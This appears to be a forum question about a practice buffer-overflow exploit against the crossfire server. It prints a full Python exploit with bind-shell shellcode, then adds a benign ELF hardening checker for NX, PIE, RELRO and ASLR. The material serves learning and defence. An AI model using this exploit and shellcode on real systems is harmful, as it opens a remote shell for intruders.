I am practicing Linux buffer overflow exploitation. When trying to exploit a vulnerability in crossfire, everything works well and I get the shellcode placed in the right place, and the program flow gets redirected to the shellcode; however, when it starts executing the shellcode, the program fails.
OS version (bt5 R3): Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
exploit code:
import socket, sys
host = sys.argv[1]
# 0x8134e77 jmp eax
# 0xb7dadad6 nop sled address
shellcode= ("\xcc\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80")
# nop sled + shellcode + filler, then the return address pointing at the sled
crash = "\x90" *199 + shellcode + "\x43" * 4090 + "\xd6\xda\xda\xb7" + "D" * 7
buffer= "\x11(setup sound " + crash + "\x90\x00#"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
s.connect((host, 13327))
print (s.recv(1024))
s.send(buffer)
s.close()
print "[*]Payload Sent !"
I placed a breakpoint before the shellcode and the execution flow hits it successfully; however, after continuing, the program crashes and gives the following message: "Program received signal SIGSEGV, Segmentation fault. 0xb7daeb36 in ?? ()"
When inspecting this address, it's full of zeros!
I already disabled ASLR before starting the exercise, and I am wondering whether any other protection mechanism exists that prevents exploitation.
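Besides ASLR, the loader-visible mitigations that decide whether a stack-resident payload can run at all are the NX bit on the stack (the PT_GNU_STACK program header), PIE and RELRO. The following is an added checker, not part of the question or of crossfire, that reads those flags straight out of the ELF program headers and the randomize_va_space sysctl; the fake_elf32 helper builds a constructed minimal image so it runs offline, and little-endian x86 layouts are assumed.

```python
import struct

PT_GNU_STACK = 0x6474E551  # program header carrying the stack's rwx flags
PT_GNU_RELRO = 0x6474E552  # region the loader makes read-only after relocation
PF_X = 0x1
ET_DYN = 3                 # shared object, which is what a PIE executable is

def elf_protections(data):
    """Summarise loader-visible hardening of a little-endian ELF image (bytes).

    nx is True only when PT_GNU_STACK is present without PF_X; a binary with
    no such header gets an executable stack on i386, so that is nx=False too.
    """
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    if data[4] == 2:  # ELFCLASS64
        e_phoff = struct.unpack_from("<Q", data, 32)[0]
        e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
        flags_off = 4   # p_flags sits right after p_type in Elf64_Phdr
    else:             # ELFCLASS32, the i686 case in the question
        e_phoff = struct.unpack_from("<I", data, 28)[0]
        e_phentsize, e_phnum = struct.unpack_from("<HH", data, 42)
        flags_off = 24  # p_flags is the seventh word of Elf32_Phdr
    e_type = struct.unpack_from("<H", data, 16)[0]
    nx, relro = False, False
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type = struct.unpack_from("<I", data, off)[0]
        p_flags = struct.unpack_from("<I", data, off + flags_off)[0]
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
    return {"pie": e_type == ET_DYN, "nx": nx, "relro": relro}

def aslr_enabled(path="/proc/sys/kernel/randomize_va_space"):
    """True unless the sysctl has been set to 0; None when it cannot be read."""
    try:
        with open(path) as f:
            return f.read().strip() != "0"
    except OSError:
        return None

def fake_elf32(stack_flags):
    """Constructed minimal ELF32 image: header plus one PT_GNU_STACK entry."""
    ehdr = bytearray(52)
    ehdr[:7] = b"\x7fELF\x01\x01\x01"  # 32-bit, little-endian, ELF version 1
    struct.pack_into("<HHIIIIIHHHHHH", ehdr, 16, 2, 3, 1, 0, 52, 0, 0, 52, 32, 1, 0, 0, 0)
    phdr = struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)
    return bytes(ehdr) + phdr

if __name__ == "__main__":
    for flags in (0x6, 0x7):  # rw- stack versus rwx stack
        print(hex(flags), elf_protections(fake_elf32(flags)), "aslr:", aslr_enabled())
```

To inspect a real binary, pass `open(path, "rb").read()` to elf_protections; an rwx PT_GNU_STACK (or none at all) is what lets shellcode on the stack execute, while nx=True means the payload itself, not only its address, has to change.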